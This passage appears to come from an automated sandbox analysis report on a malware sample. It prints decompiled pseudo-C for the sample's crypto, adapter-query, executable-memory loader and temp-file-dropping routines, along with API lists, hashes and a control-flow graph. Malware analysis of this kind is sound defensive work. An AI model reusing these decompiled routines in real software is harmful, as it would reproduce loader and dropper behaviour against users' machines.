                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                    0x00ec8a76
                                                                                                                                                                                                                                                    0x00ec8a81
                                                                                                                                                                                                                                                    0x00ec8ba3
                                                                                                                                                                                                                                                    0x00ec8ba9
                                                                                                                                                                                                                                                    0x00ec8ab9
                                                                                                                                                                                                                                                    0x00ec8ab9
                                                                                                                                                                                                                                                    0x00ec8ac9
                                                                                                                                                                                                                                                    0x00ec8ad3
                                                                                                                                                                                                                                                    0x00ec8adb
                                                                                                                                                                                                                                                    0x00ec8ae3
                                                                                                                                                                                                                                                    0x00ec8aed
                                                                                                                                                                                                                                                    0x00ec8b01
                                                                                                                                                                                                                                                    0x00ec8b0c
                                                                                                                                                                                                                                                    0x00ec8b0c
                                                                                                                                                                                                                                                    0x00ec8aed
                                                                                                                                                                                                                                                    0x00ec8b16
                                                                                                                                                                                                                                                    0x00ec8b1c
                                                                                                                                                                                                                                                    0x00ec8b37
                                                                                                                                                                                                                                                    0x00ec8b3f
                                                                                                                                                                                                                                                    0x00ec8b41
                                                                                                                                                                                                                                                    0x00ec8b66
                                                                                                                                                                                                                                                    0x00ec8b80
                                                                                                                                                                                                                                                    0x00ec8b87
                                                                                                                                                                                                                                                    0x00ec8b87
                                                                                                                                                                                                                                                    0x00ec8b91
                                                                                                                                                                                                                                                    0x00ec8b91
                                                                                                                                                                                                                                                    0x00ec8b9d
                                                                                                                                                                                                                                                    0x00ec8b9d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec8b16

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8AD3
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC8ADD
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8B0C
                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00EC8B37
                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC8B5E
                                                                                                                                                                                                                                                    • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00EC8B7A
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B87
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B91
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8B9D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8AFC
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC8AC4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                    • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                    • Opcode ID: efdbbc3a895658366695e3bf684988fbbfa21d625c3ef021a8f08a5a001ad324
                                                                                                                                                                                                                                                    • Instruction ID: 61e96a6c75382ce2494a26298f0e7591596c8f04322258134bab111a92c57326
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdbbc3a895658366695e3bf684988fbbfa21d625c3ef021a8f08a5a001ad324
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3127B5A00209EFDB14CFA5CE49FEE77B8EB48704F14811CF505B6280CBB69A46CB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                    			E00EC8970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				long* _v20;
                                                                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                                    				char* _t47;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t27 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                                                                    						_v16 = GetLastError();
                                                                                                                                                                                                                                                    						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                    							_t47 =  *0xed3370; // 0xecc6e4
                                                                                                                                                                                                                                                    							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                    							_t33 = _v20;
                                                                                                                                                                                                                                                    							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                    							_v8 = _t33;
                                                                                                                                                                                                                                                    							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x00ec8976
                                                                                                                                                                                                                                                    0x00ec8981
                                                                                                                                                                                                                                                    0x00ec8a60
                                                                                                                                                                                                                                                    0x00ec8a66
                                                                                                                                                                                                                                                    0x00ec89a5
                                                                                                                                                                                                                                                    0x00ec89a5
                                                                                                                                                                                                                                                    0x00ec89b5
                                                                                                                                                                                                                                                    0x00ec89bf
                                                                                                                                                                                                                                                    0x00ec89c7
                                                                                                                                                                                                                                                    0x00ec89cf
                                                                                                                                                                                                                                                    0x00ec89d9
                                                                                                                                                                                                                                                    0x00ec89ed
                                                                                                                                                                                                                                                    0x00ec89f8
                                                                                                                                                                                                                                                    0x00ec89f8
                                                                                                                                                                                                                                                    0x00ec89d9
                                                                                                                                                                                                                                                    0x00ec8a02
                                                                                                                                                                                                                                                    0x00ec8a04
                                                                                                                                                                                                                                                    0x00ec8a27
                                                                                                                                                                                                                                                    0x00ec8a3d
                                                                                                                                                                                                                                                    0x00ec8a41
                                                                                                                                                                                                                                                    0x00ec8a47
                                                                                                                                                                                                                                                    0x00ec8a4e
                                                                                                                                                                                                                                                    0x00ec8a4e
                                                                                                                                                                                                                                                    0x00ec8a5a
                                                                                                                                                                                                                                                    0x00ec8a5a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec8a02

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC89BF
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC89C9
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC89F8
                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC8A1F
                                                                                                                                                                                                                                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00EC8A41
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8A4E
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8A5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC89B0
                                                                                                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00EC89E8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                    • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                    • Opcode ID: 3c1a20744aef626269598c4ffb4477034c184469ffa5cce363440ae8b8de0968
                                                                                                                                                                                                                                                    • Instruction ID: 205a461ead9d04cbc5340cc67e1afa1bb14dec8e877e3ee6488fb01fa8c8d845
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c1a20744aef626269598c4ffb4477034c184469ffa5cce363440ae8b8de0968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74312B71A40208EFDB14CFA5CE49FAE77B8FB44704F14815DF519B6280CBB69A86CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00E42221
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0063F02F,00003000,00000040), ref: 00E42289
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00E42350
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.858688043.0000000000E42000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E42000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e42000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: .$GetProcAddress.$l$lloc
                                                                                                                                                                                                                                                    • API String ID: 2441068224-1161241244
                                                                                                                                                                                                                                                    • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                    • Instruction ID: 68d2324ebf385254832783caad9b372f41e3d61561f72ea2658ee46f6175a6c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE2255B1A002199FDB14CFA9C884BAEBBB5FF48314F658169EA15AB340D774E941CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                    			E00EC9F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                    					if(_a8 > 5) {
                                                                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                                                                    						_t59 = E00EC97A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                    						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                    						_v28 = _t59;
                                                                                                                                                                                                                                                    						_v12 = _v28;
                                                                                                                                                                                                                                                    						if(_v12 != 0) {
                                                                                                                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                                                                                                                    							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                    							_push( &_v20);
                                                                                                                                                                                                                                                    							_t64 = _v12;
                                                                                                                                                                                                                                                    							_push(_t64); // executed
                                                                                                                                                                                                                                                    							L00ECB1DA(); // executed
                                                                                                                                                                                                                                                    							if(_t64 == 0) {
                                                                                                                                                                                                                                                    								_v24 = 0;
                                                                                                                                                                                                                                                    								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                    									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                    										E00EC7B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                    										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                    										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                    										_v12 =  *_v12;
                                                                                                                                                                                                                                                    										_v8 = 1;
                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *_a12 = _v24;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v32 = _v16;
                                                                                                                                                                                                                                                    							E00EC97C0(_v32);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                    0x00ec9f76
                                                                                                                                                                                                                                                    0x00ec9f81
                                                                                                                                                                                                                                                    0x00ec9f87
                                                                                                                                                                                                                                                    0x00ec9f8b
                                                                                                                                                                                                                                                    0x00ec9f94
                                                                                                                                                                                                                                                    0x00ec9fad
                                                                                                                                                                                                                                                    0x00ec9fb2
                                                                                                                                                                                                                                                    0x00ec9fb5
                                                                                                                                                                                                                                                    0x00ec9fbb
                                                                                                                                                                                                                                                    0x00ec9fc2
                                                                                                                                                                                                                                                    0x00ec9fcb
                                                                                                                                                                                                                                                    0x00ec9fe0
                                                                                                                                                                                                                                                    0x00ec9fe6
                                                                                                                                                                                                                                                    0x00ec9fe7
                                                                                                                                                                                                                                                    0x00ec9fea
                                                                                                                                                                                                                                                    0x00ec9feb
                                                                                                                                                                                                                                                    0x00ec9ff2
                                                                                                                                                                                                                                                    0x00ec9ff4
                                                                                                                                                                                                                                                    0x00ec9ffb
                                                                                                                                                                                                                                                    0x00eca018
                                                                                                                                                                                                                                                    0x00eca034
                                                                                                                                                                                                                                                    0x00eca039
                                                                                                                                                                                                                                                    0x00eca048
                                                                                                                                                                                                                                                    0x00eca050
                                                                                                                                                                                                                                                    0x00eca053
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca05e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca018
                                                                                                                                                                                                                                                    0x00eca066
                                                                                                                                                                                                                                                    0x00eca066
                                                                                                                                                                                                                                                    0x00eca06b
                                                                                                                                                                                                                                                    0x00eca072
                                                                                                                                                                                                                                                    0x00eca077
                                                                                                                                                                                                                                                    0x00ec9fc2
                                                                                                                                                                                                                                                    0x00ec9f8b
                                                                                                                                                                                                                                                    0x00eca080

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EC97A0: GetProcessHeap.KERNEL32(00000008,00EC9FB2,?,00EC9FB2,00000000,?,?,?,00EC9E2D), ref: 00EC97A9
                                                                                                                                                                                                                                                      • Part of subcall function 00EC97A0: RtlAllocateHeap.NTDLL(00000000,?,00EC9FB2,00000000,?,?,?,00EC9E2D), ref: 00EC97B0
                                                                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00EC9E2D), ref: 00EC9FEB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1318000056-0
                                                                                                                                                                                                                                                    • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                    • Instruction ID: e07030c96ef60a5bfda4a2a66facb4adf47097d717b9efe223d372646b317cc6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58311BB4A0020DEFCB04CF98C596BEEB7B5EF48308F14816DE909A7351D7369A42CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 298 ec62b0-ec62c4 299 ec6c4e 298->299 300 ec62ca-ec62ce 298->300 301 ec6c51-ec6c54 299->301 300->299 302 ec62d4-ec62e0 300->302 302->299 303 ec62e6-ec62ed 302->303 303->299 304 ec62f3-ec6314 303->304 306 ec642e-ec6453 304->306 307 ec631a-ec631e 304->307 314 ec6c2f-ec6c36 306->314 315 ec6459-ec645d 306->315 308 ec6320-ec633a 307->308 309 ec6343-ec6363 307->309 308->309 311 ec633c-ec633e 308->311 312 ec6429 309->312 313 ec6369-ec6375 309->313 311->301 312->306 313->312 316 ec637b-ec6384 313->316 317 ec6c38-ec6c42 314->317 318 ec6c44 314->318 319 ec645f-ec6479 315->319 320 ec6482-ec64a2 315->320 316->312 321 ec638a-ec6393 316->321 317->299 318->299 319->320 322 ec647b-ec647d 319->322 323 ec64a8-ec64b4 320->323 324 ec65f3-ec65fc 320->324 321->312 327 ec6399-ec63a2 321->327 322->301 323->324 328 ec64ba-ec654c GetEnvironmentVariableA call ec7d20 call ec9730 GetTickCount GetTempFileNameA CreateFileA 323->328 325 ec65fe 324->325 326 ec6603-ec660f 324->326 325->326 330 ec6bdd-ec6be9 326->330 331 ec6615-ec6621 326->331 332 ec63a4-ec63ca VirtualAlloc 327->332 333 ec6410-ec6424 call ec1ee0 327->333 328->324 354 ec6552-ec6586 WriteFile 328->354 339 ec6c18-ec6c24 330->339 340 ec6beb-ec6bf7 330->340 331->330 336 ec6627-ec6640 call ec7250 331->336 337 ec63cc-ec63e4 call ec6260 332->337 338 ec640e 332->338 342 ec6427 333->342 355 ec6647-ec664e 336->355 356 ec6642 336->356 357 ec63fd-ec6408 VirtualFree 337->357 358 ec63e6-ec63fa call ec1ee0 337->358 338->342 343 ec6c2a 339->343 344 ec6c26 339->344 340->339 348 ec6bf9-ec6c16 call eca360 340->348 342->306 343->314 344->343 348->343 359 ec65dd-ec65e4 354->359 360 ec6588-ec6591 354->360 361 ec6654-ec6674 VirtualAlloc 355->361 362 ec6752-ec675b 355->362 356->355 357->338 358->357 359->324 364 ec65e6-ec65ed CloseHandle 359->364 360->359 367 ec6593-ec65c7 CloseHandle call ec6c60 call ec1e60 360->367 361->362 368 ec667a-ec6747 call ec7b70 call ec97a0 CreateThread CloseHandle 361->368 365 ec69ba-ec6a49 GetEnvironmentVariableA call ec7d20 call ec9730 GetTickCount GetTempFileNameA CreateFileA 362->365 366 ec6761-ec6788 362->366 364->324 393 ec6a4f-ec6a75 365->393 394 ec6bd6 365->394 370 ec678e-ec67c0 VirtualAlloc 366->370 371 ec6858-ec6864 call ec2070 366->371 399 ec65d8 call ec6cf0 367->399 400 ec65c9-ec65d0 call ec74a0 ExitProcess 367->400 368->362 377 ec6856 370->377 378 ec67c6-ec67e7 call ec6260 370->378 382 ec686a-ec6871 371->382 377->382 397 ec67e9-ec6807 call ec2070 378->397 398 ec6842-ec6850 VirtualFree 378->398 389 ec6877-ec687e 382->389 390 ec69b0 382->390 395 ec6894-ec689d 389->395 396 ec6880-ec6891 call ec73c0 389->396 390->365 401 ec6b1e-ec6b3c WriteFile 393->401 402 ec6a7b-ec6aad VirtualAlloc 393->402 394->330 404 ec698a-ec6993 395->404 405 ec68a3-ec68c8 call ec97a0 395->405 396->395 397->398 423 ec6809-ec683a VirtualAlloc call ec7b70 397->423 398->377 399->359 414 ec6b42-ec6b49 401->414 409 ec6b1c 402->409 410 ec6aaf-ec6ad0 call ec6260 402->410 411 ec69a9 404->411 412 ec6995-ec69a6 call ec2510 404->412 427 ec68e9-ec690d VirtualAlloc 405->427 428 ec68ca-ec68e7 405->428 409->414 432 ec6b08-ec6b16 VirtualFree 410->432 433 ec6ad2-ec6b02 WriteFile 410->433 411->390 412->411 420 ec6bc9-ec6bd0 CloseHandle 414->420 421 ec6b4b-ec6b57 414->421 420->394 421->420 426 ec6b59-ec6b82 CloseHandle call ec1e60 421->426 435 ec683f 423->435 440 ec6b84-ec6b8b 426->440 441 ec6bc7 426->441 430 ec690f-ec6931 call ec7b70 427->430 431 ec6934-ec693d 427->431 428->431 430->431 431->404 437 ec693f-ec6984 CreateThread CloseHandle 431->437 432->409 433->432 435->398 437->404 442 ec6b8d-ec6b9e call ec73c0 440->442 443 ec6ba1-ec6baa 440->443 441->394 442->443 445 ec6bac-ec6bbd call ec2510 443->445 446 ec6bc0 443->446 445->446 446->441
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC62B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				void* _v52;
                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                    				void _v60;
                                                                                                                                                                                                                                                    				char _v324;
                                                                                                                                                                                                                                                    				void* _v328;
                                                                                                                                                                                                                                                    				char _v340;
                                                                                                                                                                                                                                                    				char _v604;
                                                                                                                                                                                                                                                    				int _v608;
                                                                                                                                                                                                                                                    				long _v612;
                                                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                                                    				void* _v620;
                                                                                                                                                                                                                                                    				void* _v624;
                                                                                                                                                                                                                                                    				void* _v628;
                                                                                                                                                                                                                                                    				int _v632;
                                                                                                                                                                                                                                                    				signed int _v636;
                                                                                                                                                                                                                                                    				long _v640;
                                                                                                                                                                                                                                                    				void* _v644;
                                                                                                                                                                                                                                                    				void* _v648;
                                                                                                                                                                                                                                                    				void* _v652;
                                                                                                                                                                                                                                                    				char _v916;
                                                                                                                                                                                                                                                    				void* _v920;
                                                                                                                                                                                                                                                    				char _v932;
                                                                                                                                                                                                                                                    				char _v1196;
                                                                                                                                                                                                                                                    				long _v1200;
                                                                                                                                                                                                                                                    				int _v1204;
                                                                                                                                                                                                                                                    				long _v1208;
                                                                                                                                                                                                                                                    				void* _v1212;
                                                                                                                                                                                                                                                    				long _v1216;
                                                                                                                                                                                                                                                    				signed int _v1220;
                                                                                                                                                                                                                                                    				void* _v1224;
                                                                                                                                                                                                                                                    				void* _v1228;
                                                                                                                                                                                                                                                    				intOrPtr _t317;
                                                                                                                                                                                                                                                    				signed char _t321;
                                                                                                                                                                                                                                                    				void* _t333;
                                                                                                                                                                                                                                                    				signed int _t340;
                                                                                                                                                                                                                                                    				void* _t349;
                                                                                                                                                                                                                                                    				signed int _t355;
                                                                                                                                                                                                                                                    				void* _t361;
                                                                                                                                                                                                                                                    				void* _t368;
                                                                                                                                                                                                                                                    				void* _t378;
                                                                                                                                                                                                                                                    				void* _t381;
                                                                                                                                                                                                                                                    				signed int _t383;
                                                                                                                                                                                                                                                    				void* _t386;
                                                                                                                                                                                                                                                    				void* _t393;
                                                                                                                                                                                                                                                    				int _t415;
                                                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                                                    				signed int _t428;
                                                                                                                                                                                                                                                    				signed char _t433;
                                                                                                                                                                                                                                                    				void* _t439;
                                                                                                                                                                                                                                                    				signed char _t442;
                                                                                                                                                                                                                                                    				void* _t448;
                                                                                                                                                                                                                                                    				signed int _t452;
                                                                                                                                                                                                                                                    				intOrPtr _t455;
                                                                                                                                                                                                                                                    				void* _t465;
                                                                                                                                                                                                                                                    				void* _t472;
                                                                                                                                                                                                                                                    				void* _t473;
                                                                                                                                                                                                                                                    				void* _t508;
                                                                                                                                                                                                                                                    				void* _t509;
                                                                                                                                                                                                                                                    				void* _t528;
                                                                                                                                                                                                                                                    				void* _t529;
                                                                                                                                                                                                                                                    				void* _t539;
                                                                                                                                                                                                                                                    				void* _t549;
                                                                                                                                                                                                                                                    				void* _t550;
                                                                                                                                                                                                                                                    				void* _t551;
                                                                                                                                                                                                                                                    				void* _t563;
                                                                                                                                                                                                                                                    				void* _t598;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                    					L99:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 =  *_a4;
                                                                                                                                                                                                                                                    					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                    						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                    						while(_v24 < _v12) {
                                                                                                                                                                                                                                                    							if(_v24 <= 0) {
                                                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                                                    								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                    								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0xece270; // 0x1
                                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                                    									L22:
                                                                                                                                                                                                                                                    									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                    									__eflags = _t428;
                                                                                                                                                                                                                                                    									_v24 = _t428;
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0xece284; // 0x1
                                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                                    									goto L22;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t508 = _v20;
                                                                                                                                                                                                                                                    								__eflags =  *(_t508 + 0xc) & 0x00000002;
